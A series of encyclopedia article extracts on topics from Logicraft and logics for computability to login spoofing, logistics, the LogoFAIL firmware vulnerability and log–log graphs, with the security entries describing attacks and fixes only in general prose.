Augmenting a DEC VAX or PDP-11 multi-user minicomputer with a Logicraft MS-DOS "card" that itself is multi-user allowed a person sitting at a simple terminal to run PC applications. [ 1 ] This provided "controlled access to PC resources without putting both a PC and a VT terminal on every desk top." [ 2 ] [ 3 ] As of mid-1988, Logicraft and another firm, Virtual Microsystems Inc (VMI) were "the only commercially available products that let VAX/VMS systems run standard off-the-shelf PC applications from terminals and VAXstations ." [ 3 ]
Logicraft's Omniware was a combined hardware/software offering. [ 4 ] Some users went beyond running PC applications [ 5 ] and used serially shared CD-ROM access. [ 6 ]
This computing article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Logicraft |
Logics for computability are formulations of logic that
capture some aspect of computability as a basic notion. This usually involves a mix
of special logical connectives as well as a semantics that explains how the logic is to be interpreted in a computational way.
Probably the first formal treatment of logic for computability is the realizability interpretation by Stephen Kleene in 1945, who gave an interpretation of intuitionistic number theory in terms of Turing machine computations. His motivation was to make precise the Heyting–Brouwer–Kolmogorov (BHK) interpretation of intuitionism, according to which proofs of mathematical statements are to be viewed as constructive procedures.
With the rise of many other kinds of logic, such as modal logic and linear logic , and novel semantic models, such as game semantics , logics for computability have been formulated in several contexts. Here we mention two.
Kleene's original realizability interpretation has received much attention among those who study connections between computability and logic. It was extended to full higher-order intuitionistic logic by Martin Hyland in 1982, who constructed the effective topos . In 2002, Steve Awodey , Lars Birkedal , and Dana Scott formulated a modal logic for computability , which extended the usual realizability interpretation with two modal operators expressing the notion of being "computably true".
Computability logic refers to a research programme initiated by Giorgi Japaridze in 2003. Its ambition is to redevelop logic from a game-theoretic semantics. Such a semantics sees games as formal equivalents of interactive computational problems, and their "truth" as existence of algorithmic winning strategies. | https://en.wikipedia.org/wiki/Logics_for_computability |
Login spoofings are techniques used to steal a user's password . [ 1 ] [ 2 ] The user is presented with an ordinary looking login prompt for username and password, which is actually a malicious program (usually called a Trojan horse ) under the control of the attacker . When the username and password are entered, this information is logged or in some way passed along to the attacker, breaching security.
To prevent this, some operating systems require a special key combination (called a secure attention key ) to be entered before a login screen is presented, for example Control-Alt-Delete . Users should be instructed to report login prompts that appear without having pressed this secure attention sequence . Only the kernel , which is the part of the operating system that interacts directly with the hardware, can detect whether the secure attention key has been pressed, so it cannot be intercepted by third party programs (unless the kernel itself has been compromised).
While similar to login spoofing, phishing usually involves a scam in which victims respond to unsolicited e-mails that are either identical or similar in appearance to a familiar site which they may have prior affiliation with. Login spoofing usually is indicative of a much more heinous form of vandalism or attack in which case the attacker has already gained access to the victim computer to at least some degree.
Internet-based login spoofing [ 3 ] can be caused by | https://en.wikipedia.org/wiki/Login_spoofing |
Logistics is the part of supply chain management that deals with the efficient forward and reverse flow of goods, services, and related information from the point of origin to the point of consumption according to the needs of customers. [ 2 ] [ 3 ] Logistics management is a component that holds the supply chain together. [ 3 ] The resources managed in logistics may include tangible goods such as materials, equipment, and supplies, as well as food and other edible items.
In military logistics , it is concerned with maintaining army supply lines with food, armaments, ammunition, and spare parts apart from the transportation of troops themselves. Meanwhile, civil logistics deals with acquiring, moving, and storing raw materials, semi-finished goods, and finished goods. For organisations that provide garbage collection , mail deliveries, public utilities , and after-sales services, logistical problems must be addressed. [ 2 ]
Logistics deals with the movements of materials or products from one facility to another; it does not include material flow within the production or assembly plants, such as production planning or single-machine scheduling . [ 2 ] Logistics occupies a significant amount of the operational cost of an organisation or country. Logistical costs of organizations in the United States incurred about 11% of the United States national gross domestic product (GDP) as of 1997. In the European Union , logistics costs were 8.8% to 11.5% of GDP as of 1993. [ 2 ]
Dedicated simulation software can model, analyze, visualize, and optimize logistics' complexity. Minimizing resource use is a common motivation in all logistics fields. A professional working in logistics management is called a logistician.
The term logistics is attested in English from 1846. It is from French: logistique , where it was either coined or popularized by Swiss military officer and writer Antoine-Henri Jomini , who defined it in his Summary of the Art of War ( Précis de l'Art de la Guerre ). The term appears in the 1830 edition, then titled Analytic Table ( Tableau Analytique ), [ 4 ] and Jomini explains that it is derived from French : logis , lit. 'lodgings' (cognate to English lodge ), in the terms French : maréchal des logis , lit. 'marshall of lodgings' and French : major-général des logis , lit. 'major-general of lodging':
Autrefois les officiers de l’état-major se nommaient: maréchal des logis, major-général des logis; de là est venu le terme de logistique, qu’on emploie pour désigner ce qui se rapporte aux marches d’une armée. Formerly the officers of the general staff were named: marshall of lodgings, major-general of lodgings; from there came the term of logistics [ logistique ], which we employ to designate those who are in charge of the functioning of an army.
The term is credited to Jomini, and the term and its etymology criticized by Georges de Chambray [ fr ] in 1832, writing: [ 5 ]
Logistique : Ce mot me paraît être tout-à-fait nouveau, car je ne l'avais encore vu nulle part dans la littérature militaire. … il paraît le faire dériver du mot logis , étymologie singulière … Logistic : This word appears to me to be completely new, as I have not yet seen it anywhere in military literature. … he appears to derive it from the word lodgings [ logis ], a peculiar etymology …
Chambray also notes that the term logistique was present in the Dictionnaire de l'Académie française as a synonym for algebra .
The French word: logistique is a homonym of the existing mathematical term, from Ancient Greek : λογῐστῐκός , romanized : logistikós , a traditional division of Greek mathematics ; the mathematical term is presumably the origin of the term logistic in logistic growth and related terms. Some sources give this instead as the source of logistics , [ 6 ] either ignorant of Jomini's statement that it was derived from logis , or dubious and instead believing it was in fact of Greek origin, or influenced by the existing term of Greek origin.
Jomini originally defined logistics as: [ 4 ]
... l'art de bien ordonner les marches d'une armée, de bien combiner l'ordre des troupes dans les colonnes, les tems [temps] de leur départ, leur itinéraire, les moyens de communications nécessaires pour assurer leur arrivée à point nommé ...
... the art of well-ordering the functionings of an army, of well combining the order of troops in columns, the times of their departure, their itinerary, the means of communication necessary to assure their arrival at the right time ...
The Oxford English Dictionary defines logistics as "the branch of military science relating to procuring, maintaining and transporting material, personnel and facilities". However, the New Oxford American Dictionary defines logistics as "the detailed coordination of a complex operation involving many people, facilities, or supplies", and the Oxford Dictionary on-line defines it as "the detailed organization and implementation of a complex operation". [ 7 ] As such, logistics is commonly seen as a branch of engineering that creates "people systems" rather than "machine systems".
According to the Council of Supply Chain Management Professionals (previously the Council of Logistics Management), [ 8 ] logistics is the process of planning, implementing and controlling procedures for the efficient and effective
transportation and storage of goods including services and related information from the point of origin to the point of consumption for the purpose of conforming to customer requirements and includes inbound, outbound, internal and external movements. [ 9 ]
Academics and practitioners traditionally refer to the terms operations or production management when referring to physical transformations taking place in a single business location (factory, restaurant or even bank clerking) and reserve the term logistics for activities related to distribution, that is, moving products on the territory. Managing a distribution center is seen, therefore, as pertaining to the realm of logistics since, while in theory, the products made by a factory are ready for consumption they still need to be moved along the distribution network according to some logic, and the distribution center aggregates and processes orders coming from different areas of the territory. That being said, from a modeling perspective, there are similarities between operations management and logistics, and companies sometimes use hybrid professionals, with for example a "Director of Operations" or a "Logistics Officer" working on similar problems. Furthermore, the term " supply chain management " originally referred to, among other issues, having an integrated vision of both production and logistics from point of origin to point of production. [ 10 ] All these terms may suffer from semantic change as a side effect of advertising.
Logistical activities can be divided into three main areas: order processing, inventory management, and freight transportation. Traditionally, order processing was a time-consuming activity that could take up to 70% of the order-cycle time. However, with new technologies such as bar code scanning, computers, and network connection, customer orders can quickly reach the seller in no time, and the availability of stocks can be checked in real time. The purpose of having an inventory is to reduce the overall logistical cost while improving service to customers. Having a stockpile of finished goods beforehand can reduce the frequency of transportation to and from the customers and cope with the randomness of customer demands. However, maintaining an inventory requires capital investment in finished goods and maintaining a warehouse. Storage and order picking occupy most of the warehouse maintenance cost. Freight transportation forms a vital part of logistics and allows access to broad markets as goods can be transported to hundreds or thousands of kilometers away. Freight transportation accounts for two-thirds of logistical costs and significantly impacts customer service. Transportation policies and warehouse management are closely intertwined. [ 2 ]
The rise of commercial transactions through the internet gives rise to the need for "e-logistics". Compared to traditional logistics, e-logistics handles parcels valued at less than a hundred US dollars to customers scattered at various destinations worldwide. In e-logistics, customers' demands come in waves when compared to traditional logistics, where the demand is consistent. [ 2 ]
Inbound logistics is one of the primary logistics processes concentrating on purchasing and arranging the inbound movement of materials, parts, or unfinished inventory from suppliers to manufacturing or assembly plants, warehouses, or retail stores.
Outbound logistics is the process related to the storage and movement of the final product. The related information flows from the end of the production line to the end user.
Given the services performed by logisticians, the main fields of logistics can be broken down as follows:
Procurement logistics consists of market research , requirements planning, make-or-buy decisions, supplier management, ordering, and order control. The targets in procurement logistics might be contradictory: maximizing efficiency by concentrating on core competencies, outsourcing while maintaining the company's autonomy, or minimizing procurement costs while maximizing security within the supply process.
Advance logistics consists of the activities required to set up or establish a plan for logistics activities to occur.
Global logistics is technically the process of managing the "flow" of goods through a supply chain from its place of production to other parts of the world. This often requires an intermodal transport system via ocean, air, rail, and truck. The effectiveness of global logistics is measured in the Logistics Performance Index .
Distribution logistics has, as its main task, the delivery of the finished products to the customer. It consists of order processing, warehousing, and transportation. Distribution logistics is necessary because production time, place, and quantity differ with the time, place, and quantity of consumption. [ 11 ]
Disposal logistics has the main function of reducing logistics cost(s) and enhancing service(s) related to the disposal of waste produced during a business's operation.
Reverse logistics denotes all those reusing products and materials operations. The reverse logistics process includes the management and the sale of surpluses, as well as products being returned to vendors from buyers. It is "the process of planning, implementing, and controlling the efficient, cost-effective flow of raw materials, in-process inventory, finished goods, and related information from the point of consumption to the point of origin to recapture value or proper disposal." [ 12 ] More precisely, reverse logistics moves goods from their typical final destination to capture value or proper disposal. The opposite of reverse logistics is forward logistics .
' Green logistics describes all attempts to measure and minimize the ecological impact of logistics activities, including all activities of the forward and reverse flows. This can be achieved through intermodal freight transport , path optimization, vehicle saturation, and city logistics .
RAM logistics (see also Logistic engineering ) combines both business logistics and military logistics since it concerns highly complicated technological systems for which reliability , availability and maintainability are essential, e.g., weapon system and military supercomputers.
Asset control logistics : companies in the retail channels, both organized retailers and suppliers, often deploy assets required for the display, preservation, and promotion of their products. Some examples are refrigerators, stands, display monitors, seasonal equipment, poster stands & frames.
Emergency logistics (or humanitarian logistics ) is a term used by the logistics, supply chain, and manufacturing industries to denote specific time-critical modes of transport used to move goods rapidly in the event of an emergency. [ 13 ] The reason for enlisting emergency logistics services could be a production delay or anticipated production delay, or an urgent need for specialized equipment to prevent events such as aircraft being grounded (also known as " aircraft on ground "—AOG), ships being delayed, or telecommunications failure. Humanitarian logistics involves governments, the military, aid agencies , donors, non-governmental organizations, and emergency logistics services are typically sourced from a specialist provider. [ 13 ] [ 14 ]
The term production logistics describes logistic processes within a value-adding system (ex, a factory or a mine). Production logistics aims to ensure that each machine and workstation receives the right product in the correct quantity and quality at the right time. The concern is with production, testing, transportation, storage, and supply. Production logistics can operate in existing as well as new plants. Since manufacturing in an existing plant is a constantly changing process, machines are exchanged and new ones added, which allows for improving the production logistics system accordingly. [ 15 ] Production logistics provides the means to achieve customer response and capital efficiency. Production logistics becomes more important with decreasing batch sizes. In many industries (e.g. mobile phones ), the short-term goal is a batch size of one, allowing even a single customer's demand to be fulfilled efficiently. Track and tracing , which is an essential part of production logistics due to product safety and reliability issues, is also gaining importance, especially in the automotive and medical industries.
Construction logistics has been employed by civilizations for thousands of years as the various human civilizations tried to build the best possible works of construction for living and protection. Now, construction logistics has emerged as a vital part of construction. In the past few years, construction logistics has emerged as a different field of knowledge and study within supply chain management and logistics.
The Seven R's is a popular concept used to enforce best practices in logistics management which consists of the following: [ 16 ]
In military science, maintaining one's supply lines while disrupting those of the enemy is a crucial—some would say the most crucial—element of military strategy , since an armed force without resources and transportation is defenseless. The historical leaders Hannibal , Alexander the Great , and the Duke of Wellington are considered to have been logistical geniuses: Alexander's expedition benefited considerably from his meticulous attention to the provisioning of his army, [ 18 ] Hannibal is credited to have "taught logistics" to the Romans during the Punic Wars [ 19 ] and the success of the Anglo-Portuguese army in the Peninsula War was due to the effectiveness of Wellington's supply system, despite the numerical disadvantage. [ 20 ] The defeat of the British in the American War of Independence and the defeat of the Axis in the African theater of World War II are attributed by some scholars to logistical failures. [ 21 ]
Militaries have a significant need for logistics solutions and so have developed advanced implementations. Integrated logistics support (ILS) is a discipline used in military industries to ensure an easily supportable system with a robust customer service (logistic) concept at the lowest cost and in line with (often high) reliability, availability, maintainability, and other requirements, as defined for the project.
In military logistics , Logistics Officers manage how and when to move resources to the places they are needed.
Supply chain management in military logistics often deals with a number of variables in predicting cost, deterioration, consumption , and future demand. The United States Armed Forces ' categorical supply classification was developed in such a way that categories of supply with similar consumption variables are grouped together for planning purposes. For instance, peacetime consumption of ammunition and fuel will be considerably lower than wartime consumption of these items, whereas other classes of supply such as subsistence and clothing have a relatively consistent consumption rate regardless of war or peace.
Some classes of supply have a linear demand relationship: as more troops are added, more supply items are needed; or as more equipment is used, more fuel and ammunition are consumed. Other classes of supply must consider a third variable besides usage and quantity: time. As equipment ages, more and more repair parts are needed over time, even when usage and quantity stay consistent. By recording and analyzing these trends over time and applying them to future scenarios, the US Armed Forces can accurately supply troops with the items necessary at the precise moment they are needed. [ 22 ] History has shown that good logistical planning creates a lean and efficient fighting force. The lack thereof can lead to a clunky, slow, and ill-equipped force with too much or too little supply.
One definition of business logistics speaks of "having the right item in the right quantity at the right time at the right place for the right price in the right condition to the right customer". [ 23 ] Business logistics incorporates all industry sectors and aims to manage the fruition of project life cycles , supply chains , and resultant efficiencies.
The term business logistics has evolved since the 1960s [ 24 ] due to the increasing complexity of supplying businesses with materials and shipping out products in an increasingly globalized supply chain, leading to a call for professionals called supply chain logisticians.
In business, logistics may have either an internal focus (inbound logistics) or an external focus (outbound logistics), covering the flow and storage of materials from point of origin to point of consumption, a key factor in supply-chain management . The main functions of a qualified logistician include inventory management , purchasing , transportation, warehousing , consultation, and the organizing and planning of these activities. Logisticians combine professional knowledge of each of these functions to coordinate resources in an organization.
There are two fundamentally different forms of logistics: one optimizes a steady flow of material through a network of transport links and storage nodes, while the other coordinates a sequence of resources to carry out some project , such as restructuring a warehouse.
A distribution network would require several intermediaries to bring consumer or industrial goods from manufacturers to a user. Intermediaries would markup the costs of the products during distribution, but benefit users by providing lower transportation costs than the manufacturers. The number of intermediaries required for the distribution network depends upon the types of goods being distributed. For example, consumer goods such as cosmetics and handicrafts may not require any intermediaries as they can be sold door-to-door or can be obtained from local flea markets. For industrial goods such as raw materials and equipment, intermediaries are not needed because manufacturers can sell a large number of goods to a user. Generally, there are three types of intermediaries, namely: agent/broker, wholesaler, and retailer. [ 2 ]
The nodes of a distribution network include:
A logistic family is a set of products that share a common characteristic: weight and volumetric characteristics, physical storing needs (temperature, radiation, etc.), handling needs, order frequency, package size, etc. The following metrics may be used by the company to organize its products in different families: [ 25 ]
Other metrics may present themselves in both physical or monetary form, such as the standard inventory turnover .
Unit loads are combinations of individual items which are moved by handling systems, usually employing a pallet of normed dimensions. [ 26 ]
Handling systems include: trans-pallet handlers, counterweight handler, retractable mast handler, bilateral handlers, trilateral handlers, AGV and other handlers.
Storage systems include: pile stocking, cell racks (either static or movable), cantilever racks and gravity racks. [ 27 ]
Order processing is a sequential process involving: processing withdrawal list, picking (selective removal of items from loading units), sorting (assembling items based on the destination), package formation (weighting, labeling, and packing), order consolidation (gathering packages into loading units for transportation, control and bill of lading ). [ 28 ]
Picking can be both manual or automated. Manual picking can be both man-to-goods, i.e. operator using a cart or conveyor belt, or goods-to-man, i.e. the operator benefiting from the presence of a mini-load ASRS , vertical or horizontal carousel or from an Automatic Vertical Storage System (AVSS). Automatic picking is done either with dispensers or depalletizing robots.
Sorting can be done manually through carts or conveyor belts, or automatically through sorters .
Consolidating small shipments into large shipments can help to save transportation costs. There are three methods to do this: facility consolidation, multi-stop consolidation, and temporal consolidation. Facility consolidation uses the economics of scale by transporting small shipments over short distances and large shipments over long distances. Multi-stop consolidation makes multiple stops to consolidate small shipments in the case of less-than-truckload shipping . Temporal consolidation adjusts the shipping schedules forwards or backward so as to make a single large shipment rather than several small shipments over time. [ 2 ]
Cargo can be consolidated into pallets or containers. There are five basic modes of transport, namely, ship, rail, truck, air, and pipeline operated by different carrier . These shipping methods can be combined in various ways such as intermodal transport (no handling), multimodal transport , and combined transport (minimal road transport). A shipper chooses a carrier by taking into account the total cost of shipment and transit time. Air is the most expensive type of transport, followed by truck, rail, pipeline, and ship. [ 2 ]
Cargo can be organized in different shipment categories . Unit loads are usually assembled into higher standardized units such as: ISO containers , swap bodies or semi-trailers . Especially for very long distances, product transportation will likely benefit from using different transportation means: When moving cargo, typical constraints are maximum weight and volume .
Operators involved in transportation include: all train, road vehicles, boats, airplanes companies, couriers , freight forwarders and multi-modal transport operators .
Merchandise being transported internationally is usually subject to the Incoterms standards issued by the International Chamber of Commerce .
In the logistics business, a logistical system is designed at a minimum cost based on the expected customer service level. As the service improves, the number of sales also increased. As service is further improved, more sales are captured from competing providers. Further increase in customer service levels after these only increases sales marginally. [ 2 ]
Similarly to production systems, logistic systems need to be properly configured and managed. Actually a number of methodologies have been directly borrowed from operations management such as using Economic Order Quantity models for managing inventory in the nodes of the network. [ 29 ] Distribution resource planning (DRP) is similar to MRP , except that it does not concern activities inside the nodes of the network but planning distribution when moving goods through the links of the network.
Traditionally in logistics, configuration may be at the level of the warehouse ( node ) or at level of the distribution system ( network ).
Regarding a single warehouse, besides the issue of designing and building the warehouse, configuration means solving a number of interrelated technical-economic problems: dimensioning rack cells, choosing a palletizing method (manual or through robots ), rack dimensioning and design, number of racks, number and typology of retrieval systems (e.g. stacker cranes ). Some important constraints have to be satisfied: fork and load beams resistance to bending and proper placement of sprinklers . Although picking is more of a tactical planning decision than a configuration problem, it is important to take it into account when deciding the layout of the racks inside the warehouse and buying tools such as handlers and motorized carts since once those decisions are taken they will work as constraints when managing the warehouse, the same reasoning for sorting when designing the conveyor system or installing automatic dispensers .
Configuration at the level of the distribution system concerns primarily the problem of location of the nodes in geographic space and distribution of capacity among the nodes. The first may be referred to as facility location (with the special case of site selection ) while the latter to as capacity allocation. The problem of outsourcing typically arises at this level: the nodes of a supply chain are very rarely owned by a single enterprise. Distribution networks can be characterized by numbers of levels, namely the number of intermediary nodes between supplier and consumer:
This distinction is more useful for modeling purposes, but it relates also to a tactical decision regarding safety stocks : considering a two-level network, if safety inventory is kept only in peripheral warehouses then it is called a dependent system (from suppliers), if safety inventory is distributed among central and peripheral warehouses it is called an independent system (from suppliers). [ 25 ] Transportation from producer to the second level is called primary transportation, from the second level to a consumer is called secondary transportation.
Although configuring a distribution network from zero is possible, logisticians usually have to deal with restructuring existing networks due to presence of an array of factors: changing demand, product or process innovation, opportunities for outsourcing, change of government policy toward trade barriers , innovation in transportation means (both vehicles or thoroughfares ), the introduction of regulations (notably those regarding pollution) and availability of ICT supporting systems, such as ERP or e-commerce .
Once a logistic system is configured, management, meaning tactical decisions, takes place, once again, at the level of the warehouse and of the distribution network. Decisions have to be made under a set of constraints : internal, such as using the available infrastructure, or external, such as complying with the given product shelf lifes and expiration dates .
At the warehouse level, the logistician must decide how to distribute merchandise over the racks. Three basic situations are traditionally considered: shared storage, dedicated storage (rack space reserved for specific merchandise) and class-based storage (class meaning merchandise organized in different areas according to their access index).
Picking efficiency varies greatly depending on the situation. [ 28 ] For a man to goods situation, a distinction is carried out between high-level picking (vertical component significant) and low-level picking (vertical component insignificant). A number of tactical decisions regarding picking must be made:
At the level of the distribution network, tactical decisions involve mainly inventory control and delivery path optimization. Note that the logistician may be required to manage the reverse flow along with the forward flow.
Warehouse management systems (WMS) can differ significantly from warehouse control systems (WCS), although there is some overlap in functionality. A WMS plans a weekly activity forecast based on such factors as statistics and trends , whereas a WCS acts like a floor supervisor, working in real-time to get the job done by the most effective means. For example, a WMS can tell the system that it is going to need five of stock-keeping unit (SKU) A and five of SKU B hours in advance, but by the time it acts, other considerations may have come into play or there could be a logjam on a conveyor. A WCS can prevent that problem by working in real-time and adapting to the situation by making a last-minute decision based on current activity and operational status. Working synergistically , WMS and WCS can resolve these issues and maximize efficiency for companies that rely on the effective operation of their warehouse or distribution center. [ 30 ]
Logistics outsourcing involves a relationship between a company and an LSP (logistic service provider), which, compared with basic logistics services, has more customized offerings, encompasses a broad number of service activities, is characterized by a long-term orientation, and thus has a strategic nature. [ 31 ]
Outsourcing does not have to be complete externalization to an LSP, but can also be partial:
Third-party logistics (3PL) involves using external organizations to execute logistics activities that have traditionally been performed within an organization itself. [ 32 ] According to this definition, third-party logistics includes any form of outsourcing of logistics activities previously performed in house. For example, if a company with its own warehousing facilities decides to employ external transportation, this would be an example of third-party logistics. Logistics is an emerging business area in many countries. External 3PL providers have evolved from merely providing logistics capabilities to becoming real orchestrators of supply chains that create and sustain a competitive advantage, thus bringing about new levels of logistics outsourcing. [ 33 ]
The concept of a fourth-party logistics (4PL) provider was first defined by Andersen Consulting (now Accenture ) as an integrator that assembles the resources, planning capabilities, and technology of its own organization and other organizations to design, build, and run comprehensive supply chain solutions. Whereas a third-party logistics (3PL) service provider targets a single function, a 4PL targets management of the entire process. Some have described a 4PL as a general contractor that manages other 3PLs, truckers, forwarders, custom house agents, and others, essentially taking responsibility of a complete process for the customer.
Horizontal business alliances often occur between logistics service providers, i.e., the cooperation between two or more logistics companies that are potentially competing. [ 34 ] In a horizontal alliance, these partners can benefit twofold. On one hand, they can "access tangible resources which are directly exploitable". In this example extending common transportation networks, their warehouse infrastructure and the ability to provide more complex service packages can be achieved by combining resources. On the other hand, partners can "access intangible resources, which are not directly exploitable". This typically includes know-how and information and, in turn, innovation. [ 34 ]
Logistics automation is the application of computer software or automated machinery to improve the efficiency of logistics operations. This typically refers to operations within a warehouse or distribution center with broader tasks undertaken by supply chain engineering systems and enterprise resource planning systems.
Industrial machinery can typically identify products through either barcode or RFID technologies. Information in traditional bar codes is stored as a sequence of black and white bars varying in width, which when read by laser is translated into a digital sequence, which according to fixed rules can be converted into a decimal number or other data. Sometimes information in a bar code can be transmitted through radio frequency, more typically radio transmission is used in RFID tags. An RFID tag is a card containing a memory chip and an antenna that transmits signals to a reader. RFID may be found on merchandise, animals, vehicles, and people as well.
A logistician is a professional logistics practitioner. Professional logisticians are often certified by professional associations. One can either work in a pure logistics company, such as a shipping line, airport, or freight forwarder , or within the logistics department of a company. However, as mentioned above, logistics is a broad field, encompassing procurement, production, distribution, and disposal activities. Hence, career perspectives are broad as well.
A new trend [ as of? ] in the industry is the 4PL, or fourth-party logistics, firms, consulting companies offering logistics services.
Some universities and academic institutions train students as logisticians, offering undergraduate and postgraduate programs. A university with a primary focus on logistics is Kühne Logistics University in Hamburg, Germany. It is non-profit and supported by Kühne-Foundation of the logistics entrepreneur Klaus Michael Kühne .
The Chartered Institute of Logistics and Transport (CILT), established in the United Kingdom in 1919, received a Royal Charter in 1926. The Chartered Institute is one of the professional bodies or institutions for the logistics and transport sectors that offer professional qualifications or degrees in logistics management. CILT programs can be studied at centers around the UK, some of which also offer distance learning options. [ 35 ] The institute also have overseas branches namely The Chartered Institute of Logistics & Transport Australia (CILTA) [ 36 ] in Australia and Chartered Institute of Logistics and Transport in Hong Kong (CILTHK) [ 37 ] in Hong Kong. In the UK, logistics management programs are conducted by many universities and professional bodies such as CILT. These programs are generally offered at the postgraduate level.
The Global Institute of Logistics [ 38 ] established in New York in 2003 is a think tank for the profession and is primarily concerned with intercontinental maritime logistics. It is particularly concerned with container logistics and the role of the seaport authority in the maritime logistics chain.
The International Association of Public Health Logisticians (IAPHL) [ 39 ] is a professional network that promotes the professional development of supply chain managers and others working in the field of public health logistics and commodity security, with particular focus on developing countries. The association supports logisticians worldwide by providing a community of practice, where members can network, exchange ideas, and improve their professional skills.
There are many museums in the world which cover various aspects of practical logistics. These include museums of transportation, customs, packing, and industry-based logistics. However, only the following museums are fully dedicated to logistics:
General logistics
Military logistics | https://en.wikipedia.org/wiki/Logistics |
Logistics automation is the application of computer software or automated machinery to logistics operations in order to improve its efficiency. Typically this refers to operations within a warehouse or distribution center , with broader tasks undertaken by supply chain engineering systems and enterprise resource planning systems.
Logistics automation systems can powerfully complement the facilities provided by these higher level computer systems . The focus on an individual node within a wider logistics network allows systems to be highly tailored to the requirements of that node.
Logistics automation systems comprise a variety of hardware and software components:
A typical warehouse or distribution center will receive stock of a variety of products from suppliers and store these until the receipt of orders from customers, whether individual buyers (e.g. mail order), retail branches (e.g. chain stores ), or other companies (e.g. wholesalers ). A logistics automation system may provide the following:
A complete warehouse automation system can drastically reduce the workforce required to run a facility, with human input required only for a few tasks, such as picking units of product from a bulk packed case. [ 1 ] Even here, assistance can be provided with equipment such as pick-to-light units. Smaller systems may only be required to handle part of the process. Examples include automated storage and retrieval systems, which simply use cranes to store and retrieve identified cases or pallets , typically into a high-bay storage system which would be unfeasible to access using fork-lift trucks or any other means. The use of Automatic Guided Vehicles maximizes the output compared to humans since they can do repetitive tasks for long hours and with least to no supervision. An AGV is built and programmed for precision and accuracy thereby reducing the chances of errors in a warehouse, especially when dealing with fragile goods. [ 2 ]
Software or cloud -based SaaS solutions are used for logistics automation which helps the supply chain industry in automating the workflow as well as management of the system. [ 3 ] Knowledge @ Wharton staff writers noted in 2011 that some manufacturers and retailers were weathering the Great Recession "by signing up for pay-as-you-go logistics services available through the Internet 'cloud'". They identified the benefits and reduced costs which came from sharing information about shipments with suppliers, hauliers and end users. [ 4 ]
There is little generalized software available in this market. This is because there is no rule to generalize the system as well as work flow even though the practice is more or less the same. Most of the commercial companies do use one or the other of the custom solutions.
But there are various software solutions that are being used within the departments of logistics. There are a few departments in Logistics, namely: Conventional Department, Container Department, Warehouse, Marine Engineering, Heavy Haulage, etc. | https://en.wikipedia.org/wiki/Logistics_automation |
Logistics engineering is a field of engineering dedicated to the scientific organization of the purchase , transport , storage, distribution , and warehousing of materials and finished goods. Logistics engineering is a complex science that considers trade-offs in component/system design, repair capability, training, spares inventory , demand history, storage and distribution points, transportation methods, etc., to ensure the "thing" is where it's needed, when it's needed, and operating the way it's needed all at an acceptable cost.
Logistics is generally concerned with cost centre service activities, but provides value via improved efficiency and customer satisfaction. It can quickly lose that value if the customer becomes dissatisfied. The end customer can include another process or work center inside of the manufacturing facility, a warehouse where items are stocked or the final customer who will use the product. Another approach which has appeared in recent years is the supply chain management . The supply chain also looks at an efficient chaining of the supply / purchase and distribution sides of an organization . While logistics looks at single echelons with the immediate supply and distribution linked up, supply chain looks at multiple echelons/stages, right from procurement of the raw materials to the final distribution of finished goods up to the customer. It is based on the basic premise that the supply and distribution activities if integrated with the manufacturing / logistic activities, can result in better profitability for the organization. The local minimum of total cost of the manufacturing operation is getting replaced by the global minimum of total cost of the whole chain, resulting in better profitability for the chain members and hence lower costs for the products.
Logistics engineering as a discipline is a very important aspect of systems engineering that also includes reliability engineering . It is the science and process whereby reliability , maintainability , and availability are designed into products or systems. It includes the supply and physical distribution considerations above as well as more fundamental engineering considerations. Logistics engineers work with complex mathematical models that consider elements such as mean time between failures (MTBF), mean time to failure (MTTF), mean time to repair (MTTR), failure mode and effects analysis (FMEA), statistical distributions , queueing theory , and a host of other considerations. For example, if we want to produce a system that is 95% reliable (or improve a system to achieve 95% reliability), a logistics engineer understands that total system reliability can be no greater than the least reliable subsystem or component. Therefore, our logistics engineer must consider the reliability of all subcomponents or subsystems and modify system design accordingly. If a subsystem is only 50% reliable, one can concentrate on improving the reliability of that subsystem, design in multiple subsystems in parallel (5 in this case would achieve approximately 97% reliability of that subsystem), purchase and store spare subsystems for rapid change out, establish repair capability that would get a failed subsystem back in operation in the required amount of time, and/or choose any combination of those approaches to achieve the optimal cost vs. reliability solution. Then the engineer moves onto the next subsystem.
There are few differences between the terms business logistics and logistics engineering. Logistics engineering is more focused on the mathematical or scientific application of logistics. [ 1 ]
The various fields and topics that logistics engineers are involved with include:
Different performance metrics (measures of performance) are used to examine the efficiency of an organization's logistics. The most popular and widely used performance metric is the landed cost. The landed cost is the total cost of purchasing, transporting, warehousing and distributing raw materials, semi-finished and finished goods.
Another performance metric equally important is the end customer fill rate . It is the percentage of customer demand which is satisfied immediately off-the-shelf (from on-site inventory). An alternative to fill rate, is system availability .
In recent years, the United States Department of Defense (DoD) has advocated the use of performance-based logistics (PBL) contracts to manage costs for support of weapon systems .
Many top universities offer Logistics engineering programs at undergraduate and graduate levels. These programs generally combine strategy, operations, facility design, technology and management. The following institutions provide Logistics engineering programs around the world: | https://en.wikipedia.org/wiki/Logistics_engineering |
LogoFAIL is a security vulnerability and exploit thereof that affects computer motherboard firmware with TianoCore EDK II , including Insyde Software 's InsydeH2O modules and similar code in AMI and Phoenix firmware, which are commonly found on both Intel and AMD motherboards, and which enable loading of custom boot logos. The exploit was discovered in December 2023 by researchers at Binarly . [ 1 ] [ 2 ]
The vulnerability exists when the Driver Execution Environment (DXE) is active after a successful Power On Self Test (POST) in the UEFI firmware (also known as the BIOS). The UEFI's boot logo is replaced with the exploit payload at this point, and the exploit can then take control of the system. [ 2 ]
Intel patched the issue in Intel Management Engine (ME) version 16.1.30.2307 in December 2023. AMD addressed the problem in AGESA version 1.2.0.b, although some motherboard manufacturers did not include the fix under AGESA 1.2.0.c. [ 3 ]
This computer security article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/LogoFAIL |
In science and engineering , a log–log graph or log–log plot is a two-dimensional graph of numerical data that uses logarithmic scales on both the horizontal and vertical axes. Power functions – relationships of the form y = a x k {\displaystyle y=ax^{k}} – appear as straight lines in a log–log graph, with the exponent corresponding to the slope, and the coefficient corresponding to the intercept. Thus these graphs are very useful for recognizing these relationships and estimating parameters . Any base can be used for the logarithm, though most commonly base 10 (common logs) are used.
Given a monomial equation y = a x k , {\displaystyle y=ax^{k},} taking the logarithm of the equation (with any base) yields: log y = k log x + log a . {\displaystyle \log y=k\log x+\log a.}
Setting X = log x {\displaystyle X=\log x} and Y = log y , {\displaystyle Y=\log y,} which corresponds to using a log–log graph, yields the equation Y = m X + b {\displaystyle Y=mX+b}
